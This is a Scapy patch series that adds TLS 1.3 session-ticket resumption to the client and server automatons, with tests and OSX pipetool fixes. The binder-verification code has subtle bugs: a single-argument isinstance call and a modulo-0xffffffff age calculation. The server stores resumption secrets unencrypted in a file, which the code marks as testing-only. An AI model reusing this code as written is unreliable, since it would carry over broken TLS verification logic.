-556,6 +611,42 @@ def should_handle_ServerData(self): elif isinstance(p, TLSAlert): print("> Received: %r" % p) raise self.CLOSE_NOTIFY() + elif isinstance(p, TLS13NewSessionTicket): + print("> Received: %r " % p) + # If arg session_ticket_file_out is set, we save + # Save the ticket for resumption... + if self.session_ticket_file_out: + # Struct of ticket file : + # * ciphersuite_len (1 byte) + # * ciphersuite (ciphersuite_len bytes) : + # we need to the store the ciphersuite for resumption + # * ticket_nonce_len (1 byte) + # * ticket_nonce (ticket_nonce_len bytes) : + # we need to store the nonce to compute the PSK + # for resumption + # * ticket_age_len (2 bytes) + # * ticket_age (ticket_age_len bytes) : + # we need to store the time we received the ticket for + # computing the obfuscated_ticket_age when resuming + # * ticket_age_add_len (2 bytes) + # * ticket_age_add (ticket_age_add_len bytes) : + # we need to store the ticket_age_add value from the + # ticket to compute the obfuscated ticket age + # * ticket_len (2 bytes) + # * ticket (ticket_len bytes) + with open(self.session_ticket_file_out, 'wb') as f: + f.write(struct.pack("B", 2)) + # we choose wcs arbitrary... + f.write(struct.pack("!H", + self.cur_session.wcs.ciphersuite.val)) + f.write(struct.pack("B", p.noncelen)) + f.write(p.ticket_nonce) + f.write(struct.pack("!H", 4)) + f.write(struct.pack("!I", int(time.time()))) + f.write(struct.pack("!H", 4)) + f.write(struct.pack("!I", p.ticket_age_add)) + f.write(struct.pack("!H", p.ticketlen)) + f.write(self.cur_session.client_session_ticket) else: print("> Received: %r" % p) self.buffer_in = self.buffer_in[1:] @@ -895,7 +986,10 @@ def tls13_should_add_ClientHello(self): ext = [] ext += TLS_Ext_SupportedVersion_CH(versions=["TLS 1.3"]) - if self.cur_session.tls13_psk_secret: + s = self.cur_session + + if s.tls13_psk_secret: + # Check if DHE is need (both for out of band and resumption PSK) if self.tls13_psk_mode == "psk_dhe_ke": ext += TLS_Ext_PSKKeyExchangeModes(kxmodes="psk_dhe_ke") ext += TLS_Ext_SupportedGroups(groups=supported_groups) @@ -904,18 +998,45 @@ def tls13_should_add_ClientHello(self): ) else: ext += TLS_Ext_PSKKeyExchangeModes(kxmodes="psk_ke") + # RFC844, section 4.2.11. # "The "pre_shared_key" extension MUST be the last extension # in the ClientHello " - hkdf = TLS13_HKDF("sha256") - hash_len = hkdf.hash.digest_size - psk_id = PSKIdentity(identity='Client_identity') - # XXX see how to not pass binder as argument - psk_binder_entry = PSKBinderEntry(binder_len=hash_len, - binder=b"\x00" * hash_len) - - ext += TLS_Ext_PreSharedKey_CH(identities=[psk_id], - binders=[psk_binder_entry]) + # Compute the pre_shared_key extension for resumption PSK + if s.client_session_ticket: + cs_cls = _tls_cipher_suites_cls[s.tls13_ticket_ciphersuite] # noqa: E501 + hkdf = TLS13_HKDF(cs_cls.hash_alg.name.lower()) + hash_len = hkdf.hash.digest_size + # We compute the client's view of the age of the ticket (ie + # the time since the receipt of the ticket) in ms + agems = int((time.time() - s.client_ticket_age) * 1000) + # Then we compute the obfuscated version of the ticket age + # by adding the "ticket_age_add" value included in the + # ticket (modulo 2^32) + obfuscated_age = ((agems + s.client_session_ticket_age_add) & + 0xffffffff) + + psk_id = PSKIdentity(identity=s.client_session_ticket, + obfuscated_ticket_age=obfuscated_age) + + psk_binder_entry = PSKBinderEntry(binder_len=hash_len, + binder=b"\x00" * hash_len) + + ext += TLS_Ext_PreSharedKey_CH(identities=[psk_id], + binders=[psk_binder_entry]) + else: + # Compute the pre_shared_key extension for out of band PSK + # (SHA256 is used as default hash function for HKDF for out + # of band PSK) + hkdf = TLS13_HKDF("sha256") + hash_len = hkdf.hash.digest_size + psk_id = PSKIdentity(identity='Client_identity') + # XXX see how to not pass binder as argument + psk_binder_entry = PSKBinderEntry(binder_len=hash_len, + binder=b"\x00" * hash_len) + + ext += TLS_Ext_PreSharedKey_CH(identities=[psk_id], + binders=[psk_binder_entry]) else: ext += TLS_Ext_SupportedGroups(groups=supported_groups) ext += TLS_Ext_KeyShare_CH( @@ -1016,14 +1137,40 @@ def tls13_should_add_ClientHello_Retry(self): else: ext += TLS_Ext_PSKKeyExchangeModes(kxmodes="psk_ke") - hkdf = TLS13_HKDF("sha256") - hash_len = hkdf.hash.digest_size - psk_id = PSKIdentity(identity='Client_identity') - psk_binder_entry = PSKBinderEntry(binder_len=hash_len, - binder=b"\x00" * hash_len) + if s.client_session_ticket: + + # XXX Retrieve parameters from first ClientHello... + cs_cls = _tls_cipher_suites_cls[s.tls13_ticket_ciphersuite] + hkdf = TLS13_HKDF(cs_cls.hash_alg.name.lower()) + hash_len = hkdf.hash.digest_size - ext += TLS_Ext_PreSharedKey_CH(identities=[psk_id], - binders=[psk_binder_entry]) + # We compute the client's view of the age of the ticket (ie + # the time since the receipt of the ticket) in ms + agems = int((time.time() - s.client_ticket_age) * 1000) + + # Then we compute the obfuscated version of the ticket age by + # adding the "ticket_age_add" value included in the ticket + # (modulo 2^32) + obfuscated_age = ((agems + s.client_session_ticket_age_add) & + 0xffffffff) + + psk_id = PSKIdentity(identity=s.client_session_ticket, + obfuscated_ticket_age=obfuscated_age) + + psk_binder_entry = PSKBinderEntry(binder_len=hash_len, + binder=b"\x00" * hash_len) + + ext += TLS_Ext_PreSharedKey_CH(identities=[psk_id], + binders=[psk_binder_entry]) + else: + hkdf = TLS13_HKDF("sha256") + hash_len = hkdf.hash.digest_size + psk_id = PSKIdentity(identity='Client_identity') + psk_binder_entry = PSKBinderEntry(binder_len=hash_len, + binder=b"\x00" * hash_len) + + ext += TLS_Ext_PreSharedKey_CH(identities=[psk_id], + binders=[psk_binder_entry]) else: ext += TLS_Ext_SupportedGroups(groups=[_tls_named_groups[selected_group]]) # noqa: E501 diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index c5a3f4fb07a..ec7b9bd0453 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -19,11 +19,15 @@ from __future__ import print_function import socket import binascii +import struct +import time +from scapy.config import conf from scapy.packet import Raw from scapy.pton_ntop import inet_pton from scapy.utils import randstring, repr_hex from scapy.automaton import ATMT +from scapy.error import warning from scapy.layers.tls.automaton import _TLSAutomaton from scapy.layers.tls.cert import PrivKeyRSA, PrivKeyECDSA from scapy.layers.tls.basefields import _tls_version @@ -31,7 +35,8 @@ from scapy.layers.tls.crypto.groups import _tls_named_groups from scapy.layers.tls.extensions import TLS_Ext_SupportedVersion_SH, \ TLS_Ext_SupportedGroups, TLS_Ext_Cookie, \ - TLS_Ext_SignatureAlgorithms, TLS_Ext_PSKKeyExchangeModes + TLS_Ext_SignatureAlgorithms, TLS_Ext_PSKKeyExchangeModes, \ + TLS_Ext_EarlyDataIndicationTicket from scapy.layers.tls.keyexchange_tls13 import TLS_Ext_KeyShare_SH, \ KeyShareEntry, TLS_Ext_KeyShare_HRR, TLS_Ext_PreSharedKey_CH, \ TLS_Ext_PreSharedKey_SH @@ -40,16 +45,22 @@ TLSServerHello, TLSServerHelloDone, TLSServerKeyExchange, \ _ASN1CertAndExt, TLS13ServerHello, TLS13Certificate, TLS13ClientHello, \ TLSEncryptedExtensions, TLS13HelloRetryRequest, TLS13CertificateRequest, \ - TLS13KeyUpdate + TLS13KeyUpdate, TLS13NewSessionTicket from scapy.layers.tls.handshake_sslv2 import SSLv2ClientCertificate, \ SSLv2ClientFinished, SSLv2ClientHello, SSLv2ClientMasterKey, \ SSLv2RequestCertificate, SSLv2ServerFinished, SSLv2ServerHello, \ SSLv2ServerVerify from scapy.layers.tls.record import TLSAlert, TLSChangeCipherSpec, \ TLSApplicationData +from scapy.layers.tls.record_tls13 import TLS13 +from scapy.layers.tls.crypto.hkdf import TLS13_HKDF from scapy.layers.tls.crypto.suites import _tls_cipher_suites_cls, \ get_usable_ciphersuites +if conf.crypto_valid: + from cryptography.hazmat.backends import default_backend + from cryptography.hazmat.primitives import hashes + class TLSServerAutomaton(_TLSAutomaton): """ @@ -81,6 +92,7 @@ def parse_args(self, server="127.0.0.1", sport=4433, client_auth=False, is_echo_server=True, max_client_idle_time=60, + session_ticket_file=None, curve=None, cookie=False, psk=None, @@ -114,6 +126,8 @@ def parse_args(self, server="127.0.0.1", sport=4433, self.cookie = cookie self.psk_secret = psk self.psk_mode = psk_mode + self.handle_session_ticket = (session_ticket_file is not None) + self.session_ticket_file = session_ticket_file for (group_id, ng) in _tls_named_groups.items(): if ng == curve: self.curve = group_id @@ -573,6 +587,96 @@ def tls13_should_add_ServerHello_from_HRR(self): def tls13_PREPARE_SERVERFLIGHT1(self): self.add_record(is_tls13=False) + def verify_psk_binder(self, psk_identity, obfuscated_age, binder): + """ + This function verifies the binder received in the 'pre_shared_key' + extension and return the resumption PSK associated with those + values. + + The arguments psk_identity, obfuscated_age and binder are taken + from 'pre_shared_key' in the ClientHello. + """ + with open(self.session_ticket_file, "rb") as f: + for line in f: + s = line.strip().split(b';') + if len(s) < 8: + continue + ticket_label = binascii.unhexlify(s[0]) + ticket_nonce = binascii.unhexlify(s[1]) + tmp = binascii.unhexlify(s[2]) + ticket_lifetime = struct.unpack("!I", tmp)[0] + tmp = binascii.unhexlify(s[3]) + ticket_age_add = struct.unpack("!I", tmp)[0] + tmp = binascii.unhexlify(s[4]) + ticket_start_time = struct.unpack("!I", tmp)[0] + resumption_secret = binascii.unhexlify(s[5]) + tmp = binascii.unhexlify(s[6]) + res_ciphersuite = struct.unpack("!H", tmp)[0] + tmp = binascii.unhexlify(s[7]) + max_early_data_size = struct.unpack("!I", tmp)[0] + + # Here psk_identity is a Ticket type but ticket_label is bytes, + # we need to convert psk_identiy to bytes in order to compare + # both strings + if psk_identity.__bytes__() == ticket_label: + + # We compute the resumed PSK associated the resumption + # secret + self.vprint("Ticket found in database !") + if res_ciphersuite not in _tls_cipher_suites_cls: + warning("Unknown cipher suite %d" % res_ciphersuite) + # we do not try to set a default nor stop the execution + else: + cs_cls = _tls_cipher_suites_cls[res_ciphersuite] + + hkdf = TLS13_HKDF(cs_cls.hash_alg.name.lower()) + hash_len = hkdf.hash.digest_size + + tls13_psk_secret = hkdf.expand_label(resumption_secret, + b"resumption", + ticket_nonce, + hash_len) + # We verify that ticket age is not expired + agesec = int((time.time() - ticket_start_time)) + # agems = agesec * 1000 + ticket_age = (obfuscated_age - ticket_age_add) % 0xffffffff # noqa: F841, E501 + + # We verify the PSK binder + s = self.cur_session + if s.tls13_retry: + handshake_context = struct.pack("B", 254) + handshake_context += struct.pack("B", 0) + handshake_context += struct.pack("B", 0) + handshake_context += struct.pack("B", hash_len) + digest = hashes.Hash(hkdf.hash, backend=default_backend()) # noqa: E501 + digest.update(s.handshake_messages[0]) + handshake_context += digest.finalize() + for m in s.handshake_messages[1:]: + if (isinstance(TLS13ClientHello) or + isinstance(TLSClientHello)): + handshake_context += m[:-hash_len - 3] + else: + handshake_context += m + else: + handshake_context = s.handshake_messages[0][:-hash_len - 3] # noqa: E501 + + # We compute the binder key + # XXX use the compute_tls13_early_secrets() function + tls13_early_secret = hkdf.extract(None, tls13_psk_secret) + binder_key = hkdf.derive_secret(tls13_early_secret, + b"res binder", + b"") + computed_binder = hkdf.compute_verify_data(binder_key, + handshake_context) # noqa: E501 + if (agesec < ticket_lifetime and + computed_binder == binder): + self.vprint("Ticket has been accepted ! ") + self.max_early_data_size = max_early_data_size + self.resumed_ciphersuite = res_ciphersuite + return tls13_psk_secret + self.vprint("Ticket has not been accepted ! Fallback to a complete handshake") # noqa: E501 + return None + @ATMT.condition(tls13_PREPARE_SERVERFLIGHT1) def tls13_should_add_ServerHello(self): @@ -586,7 +690,7 @@ def tls13_should_add_ServerHello(self): if isinstance(e, TLS_Ext_PreSharedKey_CH): psk_identity = e.identities[0].identity obfuscated_age = e.identities[0].obfuscated_ticket_age - # binder = e.binders[0].binder + binder = e.binders[0].binder # For out-of-bound PSK, obfuscated_ticket_age should be # 0. We use this field to distinguish between out-of- @@ -616,6 +720,24 @@ def tls13_should_add_ServerHello(self): server_kse = KeyShareEntry(group=group) ext += TLS_Ext_KeyShare_SH(server_share=server_kse) ext += TLS_Ext_PreSharedKey_SH(selected_identity=0) + else: + resumption_psk = self.verify_psk_binder(psk_identity, + obfuscated_age, + binder) + if resumption_psk is None: + # We did not find a ticket matching the one provided in the + # ClientHello. We fallback to a regular 1-RTT handshake + server_kse = KeyShareEntry(group=group) + ext += [TLS_Ext_KeyShare_SH(server_share=server_kse)] + else: + # 0: "psk_ke" + # 1: "psk_dhe_ke" + if psk_key_exchange_mode == 1: + server_kse = KeyShareEntry(group=group) + ext += [TLS_Ext_KeyShare_SH(server_share=server_kse)] + + ext += [TLS_Ext_PreSharedKey_SH(selected_identity=0)] + self.cur_session.tls13_psk_secret = resumption_psk else: # Standard Handshake ext += TLS_Ext_KeyShare_SH(server_share=KeyShareEntry(group=group)) @@ -796,6 +918,45 @@ def WAITING_CLIENTDATA(self): def RECEIVED_CLIENTDATA(self): pass + def save_ticket(self, ticket): + """ + This function save a ticket and others parameters in the + file given as argument to the automaton + Warning : The file is not protected and contains sensitive + information. It should be used only for testing purpose. + """ + if (not isinstance(ticket, TLS13NewSessionTicket) or + self.session_ticket_file is None): + return + + s = self.cur_session + with open(self.session_ticket_file, "ab") as f: + # ticket;ticket_nonce;obfuscated_age;start_time;resumption_secret + line = binascii.hexlify(ticket.ticket) + line += b";" + line += binascii.hexlify(ticket.ticket_nonce) + line += b";" + line += binascii.hexlify(struct.pack("!I", ticket.ticket_lifetime)) + line += b";" + line += binascii.hexlify(struct.pack("!I", ticket.ticket_age_add)) + line += b";" + line += binascii.hexlify(struct.pack("!I", int(time.time()))) + line += b";" + line += binascii.hexlify(s.tls13_derived_secrets["resumption_secret"]) # noqa: E501 + line += b";" + line += binascii.hexlify(struct.pack("!H", s.wcs.ciphersuite.val)) + line += b";" + if (ticket.ext is None or ticket.extlen is None or + ticket.extlen == 0): + line += binascii.hexlify(struct.pack("!I", 0)) + else: + for e in ticket.ext: + if isinstance(e, TLS_Ext_EarlyDataIndicationTicket): + max_size = struct.pack("!I", e.max_early_data_size) + line += binascii.hexlify(max_size) + line += b"\n" + f.write(line) + @ATMT.condition(RECEIVED_CLIENTDATA) def should_handle_ClientData(self): if not self.buffer_in: @@ -830,6 +991,10 @@ def should_handle_ClientData(self): if self.is_echo_server or recv_data.startswith(b"GET / HTTP/1.1"): self.add_record() self.add_msg(p) + if self.handle_session_ticket: + self.add_record() + ticket = TLS13NewSessionTicket(ext=[]) + self.add_msg(ticket) raise self.ADDED_SERVERDATA() raise self.HANDLED_CLIENTDATA() @@ -844,7 +1009,25 @@ def ADDED_SERVERDATA(self): @ATMT.condition(ADDED_SERVERDATA) def should_send_ServerData(self): + if self.session_ticket_file: + save_ticket = False + for p in self.buffer_out: + if isinstance(p, TLS13): + # Check if there's a NewSessionTicket to send + save_ticket = all(map(lambda x: isinstance(x, TLS13NewSessionTicket), # noqa: E501 + p.inner.msg)) + if save_ticket: + break self.flush_records() + if self.session_ticket_file and save_ticket: + # Loop backward in message send to retrieve the parsed + # NewSessionTicket. This message is not completely build before the + # flush_records() call. Other way to build this message before ? + for p in reversed(self.cur_session.handshake_messages_parsed): + if isinstance(p, TLS13NewSessionTicket): + p.show() + self.save_ticket(p) + break raise self.SENT_SERVERDATA() @ATMT.state() diff --git a/scapy/layers/tls/extensions.py b/scapy/layers/tls/extensions.py index c252f9acc33..ad5722b6e37 100644 --- a/scapy/layers/tls/extensions.py +++ b/scapy/layers/tls/extensions.py @@ -760,7 +760,12 @@ def addfield(self, pkt, s, i): i = self.adjust(pkt, f) if i == 0: # for correct build if no ext and not explicitly 0 - return s + v = pkt.tls_session.tls_version + # Xith TLS 1.3, zero lengths are always explicit. + if v is None or v < 0x0304: + return s + else: + return s + struct.pack(self.fmt, i) return s + struct.pack(self.fmt, i) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 4d32bfdfed5..294b7832368 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -370,9 +370,26 @@ def post_build(self, p, pay): if self.ext: for e in self.ext: if isinstance(e, TLS_Ext_PreSharedKey_CH): - hkdf = TLS13_HKDF("sha256") - hash_len = hkdf.hash.digest_size - s.compute_tls13_early_secrets(external=True) + if s.client_session_ticket: + # For a resumed PSK, the hash function use + # to compute the binder must be the same + # as the one used to establish the original + # conntection. For that, we assume that + # the ciphersuite associate with the ticket + # is given as argument to tlsSession + # (see layers/tls/automaton_cli.py for an + # example) + res_suite = s.tls13_ticket_ciphersuite + cs_cls = _tls_cipher_suites_cls[res_suite] + hkdf = TLS13_HKDF(cs_cls.hash_alg.name.lower()) + hash_len = hkdf.hash.digest_size + s.compute_tls13_early_secrets(external=False) + else: + # For out of band PSK, SHA-256 is used as default + # hash functions for HKDF + hkdf = TLS13_HKDF("sha256") + hash_len = hkdf.hash.digest_size + s.compute_tls13_early_secrets(external=True) # RFC8446 4.2.11.2 # "Each entry in the binders list is computed as an HMAC diff --git a/test/tls/example_client.py b/test/tls/example_client.py index 129a140064d..046de55f7ee 100755 --- a/test/tls/example_client.py +++ b/test/tls/example_client.py @@ -28,6 +28,12 @@ help="Disable (EC)DHE exchange with PFS") parser.add_argument("--ciphersuite", help="Ciphersuite preference") parser.add_argument("--version", help="TLS Version", default="tls13") +parser.add_argument("--ticket_in", dest='session_ticket_file_in', + help="File to read a ticket from (for TLS 1.3)") +parser.add_argument("--ticket_out", dest='session_ticket_file_out', + help="File to write a ticket to (for TLS 1.3)") +parser.add_argument("--res_master", + help="Resumption master secret (for TLS 1.3)") args = parser.parse_args() @@ -58,6 +64,9 @@ mykey=basedir+"/test/tls/pki/cli_key.pem", psk=args.psk, psk_mode=psk_mode, + resumption_master_secret=args.res_master, + session_ticket_file_in=args.session_ticket_file_in, + session_ticket_file_out=args.session_ticket_file_out, ) t.run() diff --git a/test/tls/example_server.py b/test/tls/example_server.py index 60806081ba2..bb60387d728 100755 --- a/test/tls/example_server.py +++ b/test/tls/example_server.py @@ -31,6 +31,8 @@ help="Send cookie extension in HelloRetryRequest message") parser.add_argument("--client_auth", action="store_true", help="Require client authentication") +parser.add_argument("--ticket_file", dest='session_ticket_file', + help="File to write/read a ticket to (for TLS 1.3)") args = parser.parse_args() pcs = None @@ -45,6 +47,7 @@ client_auth=args.client_auth, curve=args.curve, cookie=args.cookie, + session_ticket_file=args.session_ticket_file, psk=args.psk, psk_mode=psk_mode) t.run() From e6201498dba1cb1d327a02108f80c219e423438b Mon Sep 17 00:00:00 2001 From: gpotter Date: Thu, 30 Apr 2020 15:35:14 +0200 Subject: [PATCH 0130/1632] Test session resumption --- scapy/layers/tls/automaton_cli.py | 3 ++ scapy/layers/tls/automaton_srv.py | 10 ++-- test/tls/example_server.py | 3 ++ test/tls/tests_tls_netaccess.uts | 80 +++++++++++++++++++++---------- 4 files changed, 69 insertions(+), 27 deletions(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 07c240a4702..91ce7840fe7 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -562,6 +562,9 @@ def add_ClientData(self): data = self.data_to_send.pop() if data == b"quit": return + # Command to skip sending + elif data == b"wait": + raise self.WAITING_SERVERDATA() # Command to perform a key_update (for a TLS 1.3 session) elif data == b"key_update": if self.cur_session.tls_version >= 0x0304: diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index ec7b9bd0453..6b0d9463f9c 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -25,7 +25,7 @@ from scapy.config import conf from scapy.packet import Raw from scapy.pton_ntop import inet_pton -from scapy.utils import randstring, repr_hex +from scapy.utils import get_temp_file, randstring, repr_hex from scapy.automaton import ATMT from scapy.error import warning from scapy.layers.tls.automaton import _TLSAutomaton @@ -92,6 +92,7 @@ def parse_args(self, server="127.0.0.1", sport=4433, client_auth=False, is_echo_server=True, max_client_idle_time=60, + handle_session_ticket=None, session_ticket_file=None, curve=None, cookie=False, @@ -126,7 +127,11 @@ def parse_args(self, server="127.0.0.1", sport=4433, self.cookie = cookie self.psk_secret = psk self.psk_mode = psk_mode - self.handle_session_ticket = (session_ticket_file is not None) + if handle_session_ticket is None: + handle_session_ticket = (session_ticket_file is not None) + if handle_session_ticket: + session_ticket_file = session_ticket_file or get_temp_file() + self.handle_session_ticket = handle_session_ticket self.session_ticket_file = session_ticket_file for (group_id, ng) in _tls_named_groups.items(): if ng == curve: @@ -1025,7 +1030,6 @@ def should_send_ServerData(self): # flush_records() call. Other way to build this message before ? for p in reversed(self.cur_session.handshake_messages_parsed): if isinstance(p, TLS13NewSessionTicket): - p.show() self.save_ticket(p) break raise self.SENT_SERVERDATA() diff --git a/test/tls/example_server.py b/test/tls/example_server.py index bb60387d728..c73d1104785 100755 --- a/test/tls/example_server.py +++ b/test/tls/example_server.py @@ -31,6 +31,8 @@ help="Send cookie extension in HelloRetryRequest message") parser.add_argument("--client_auth", action="store_true", help="Require client authentication") +parser.add_argument("--handle_session_ticket", action="store_true", + help="Use session tickets. Auto enabled if file provided (for TLS 1.3)") # noqa: E501 parser.add_argument("--ticket_file", dest='session_ticket_file', help="File to write/read a ticket to (for TLS 1.3)") args = parser.parse_args() @@ -47,6 +49,7 @@ client_auth=args.client_auth, curve=args.curve, cookie=args.cookie, + handle_session_ticket=args.handle_session_ticket, session_ticket_file=args.session_ticket_file, psk=args.psk, psk_mode=psk_mode) diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index eea014ed5b6..d37391eb17d 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -9,8 +9,6 @@ + TLS server automaton tests ~ server -### DISCLAIMER: Those tests are slow ### - = Load server util functions from __future__ import print_function @@ -65,10 +63,11 @@ def check_output_for_data(out, err, expected_data): return (False, None) def get_file(filename): - return os.getenv("SCAPY_ROOT_DIR")+filename if not os.path.exists(filename) else filename + return os.path.abspath(os.getenv("SCAPY_ROOT_DIR")+filename if not os.path.exists(filename) else filename) -def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth=False, psk=None): +def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth=False, + psk=None, handle_session_ticket=False): correct = False print("Server started !") with captured_output() as (out, err): @@ -89,6 +88,7 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth= curve=curve, cookie=cookie, client_auth=client_auth, + handle_session_ticket=handle_session_ticket, debug=5, **kwargs) # Sync threads @@ -100,17 +100,8 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth= # Return data q.put(res) -def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=None): - msg = ("TestS_%s_data" % suite).encode() - # Run server - q_ = Queue() - th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_), - kwargs={"curve": None, "cookie": False, "client_auth": client_auth, "psk": psk}) - th_.setDaemon(True) - th_.start() - # Synchronise threads - q_.get() - time.sleep(1) +def run_openssl_client(msg, suite="", version="", tls13=False, client_auth=False, + psk=None, sess_out=None): # Run client CA_f = get_file("/test/tls/pki/ca_cert.pem") mycert = get_file("/test/tls/pki/cli_cert.pem") @@ -126,6 +117,8 @@ def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=No args.extend(["-cert", mycert, "-key", mykey]) if psk: args.extend(["-psk", str(psk)]) + if sess_out: + args.extend(["-sess_out", sess_out]) p = subprocess.Popen( args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT @@ -148,6 +141,20 @@ def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=No break if _failed or not _one_success: raise RuntimeError("OpenSSL returned unexpected values") + +def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=None): + msg = ("TestS_%s_data" % suite).encode() + # Run server + q_ = Queue() + th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_), + kwargs={"curve": None, "cookie": False, "client_auth": client_auth, "psk": psk}) + th_.setDaemon(True) + th_.start() + # Synchronise threads + q_.get() + time.sleep(1) + # Run openssl client + run_openssl_client(msg, suite=suite, version=version, tls13=tls13, client_auth=client_auth, psk=psk) # Wait for server th_.join(5) if th_.is_alive(): @@ -210,32 +217,45 @@ from scapy.modules.six.moves.queue import Queue send_data = cipher_suite_code = version = None def run_tls_test_client(send_data=None, cipher_suite_code=None, version=None, - client_auth=False, key_update=False): + client_auth=False, key_update=False, stop_server=True, + session_ticket_file_out=None, session_ticket_file_in=None): print("Loading client...") mycert = get_file("/test/tls/pki/cli_cert.pem") if client_auth else None mykey = get_file("/test/tls/pki/cli_key.pem") if client_auth else None commands = [send_data] if key_update: - commands += ["key_update"] - commands.extend([b"stop_server", b"quit"]) + commands.append(b"key_update") + if stop_server: + commands.append(b"stop_server") + if session_ticket_file_out: + commands.append(b"wait") + commands.append(b"quit") if version == "0002": - t = TLSClientAutomaton(data=commands, version="sslv2", debug=5, mycert=mycert, mykey=mykey) + t = TLSClientAutomaton(data=commands, version="sslv2", debug=5, mycert=mycert, mykey=mykey, + session_ticket_file_in=session_ticket_file_in, + session_ticket_file_out=session_ticket_file_out) elif version == "0304": ch = TLS13ClientHello(ciphers=int(cipher_suite_code, 16)) - t = TLSClientAutomaton(client_hello=ch, data=commands, version="tls13", debug=5, mycert=mycert, mykey=mykey) + t = TLSClientAutomaton(client_hello=ch, data=commands, version="tls13", debug=5, mycert=mycert, mykey=mykey, + session_ticket_file_in=session_ticket_file_in, + session_ticket_file_out=session_ticket_file_out) else: ch = TLSClientHello(version=int(version, 16), ciphers=int(cipher_suite_code, 16)) - t = TLSClientAutomaton(client_hello=ch, data=commands, debug=5, mycert=mycert, mykey=mykey) + t = TLSClientAutomaton(client_hello=ch, data=commands, debug=5, mycert=mycert, mykey=mykey, + session_ticket_file_in=session_ticket_file_in, + session_ticket_file_out=session_ticket_file_out) print("Running client...") t.run() -def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False, key_update=False): +def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False, + key_update=False, sess_in_out=False): msg = ("TestC_%s_data" % suite).encode() # Run server q_ = Queue() print("Starting server...") th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_), - kwargs={"curve": None, "cookie": False, "client_auth": client_auth}) + kwargs={"curve": None, "cookie": False, "client_auth": client_auth, + "handle_session_ticket": sess_in_out}) th_.setDaemon(True) th_.start() # Synchronise threads @@ -244,7 +264,14 @@ def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False, time.sleep(1) print("Thread synchronised") # Run client - run_tls_test_client(msg, suite, version, client_auth, key_update) + if sess_in_out: + file_sess = get_file("/test/session") + run_tls_test_client(msg, suite, version, client_auth, key_update, session_ticket_file_out=file_sess, + stop_server=False) + run_tls_test_client(msg, suite, version, client_auth, key_update, session_ticket_file_in=file_sess, + stop_server=True) + else: + run_tls_test_client(msg, suite, version, client_auth, key_update) # Wait for server print("Client running, waiting...") th_.join(5) @@ -309,3 +336,8 @@ test_tls_client("1305", "0304", client_auth=True) ~ crypto_advanced test_tls_client("1305", "0304", key_update=True) + += Testing TLS server and client with TLS 1.3 and TLS_AES_128_CCM_8_SHA256 and session resumption +~ crypto_advanced + +test_tls_client("1305", "0304", client_auth=True, sess_in_out=True) From 9a50144b9f46e17a44fdf3bab7cc6711a5256f19 Mon Sep 17 00:00:00 2001 From: gpotter Date: Mon, 4 May 2020 13:32:53 +0200 Subject: [PATCH 0131/1632] Fix OSX pipetools --- scapy/automaton.py | 3 ++ test/pipetool.uts | 89 ++++++++++++++++------------------------------ 2 files changed, 34 insertions(+), 58 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index 749c2ee6c44..8900bb6ade1 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -219,6 +219,9 @@ def send(self, obj): def write(self, obj): self.send(obj) + def flush(self): + pass + def recv(self, n=0): if self.closed: if self.check_recv(): diff --git a/test/pipetool.uts b/test/pipetool.uts index 5b72078b04e..e1c8af3fec6 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -318,89 +318,62 @@ except: pass = Test WiresharkSink +~ wiresharksink -from io import BytesIO +q = ObjectPipe() +pkt = Ether(dst="aa:aa:aa:aa:aa:aa", src="bb:bb:bb:bb:bb:bb")/IP(dst="127.0.0.1", src="127.0.0.1")/ICMP() -f = BytesIO() -pkt = Ether(src="aa:aa:aa:aa:aa:aa", dst="aa:aa:aa:aa:aa:aa")/IP(src="127.0.0.1", dst="127.0.0.1")/ICMP() - -with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=f)) as popen: - p = PipeEngine() - src = CLIFeeder() +import mock +with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=q)) as popen: sink = WiresharkSink() - p.add(src > sink) - p.start() - src.send(pkt) - src.close() - # Prevent stop from closing the BytesIO - with mock.patch.object(f, 'close'): - p.wait_and_stop() + sink.start() + +sink.push(pkt) + +q.recv() +q.recv() +assert raw(pkt) in q.recv() popen.assert_called_once_with( [conf.prog.wireshark, '-Slki', '-'], stdin=subprocess.PIPE, stdout=None, stderr=None) -bytes_hex(f.getvalue()) -bytes_hex(raw(pkt)) -assert raw(pkt) in f.getvalue() - = Test WiresharkSink with linktype +~ wiresharksink -f = BytesIO() -pkt = Ether(src="aa:aa:aa:aa:aa:aa", dst="aa:aa:aa:aa:aa:aa")/IP(src="127.0.0.1", dst="127.0.0.1")/ICMP() linktype = scapy.data.DLT_EN3MB +q = ObjectPipe() +pkt = Ether(dst="aa:aa:aa:aa:aa:aa", 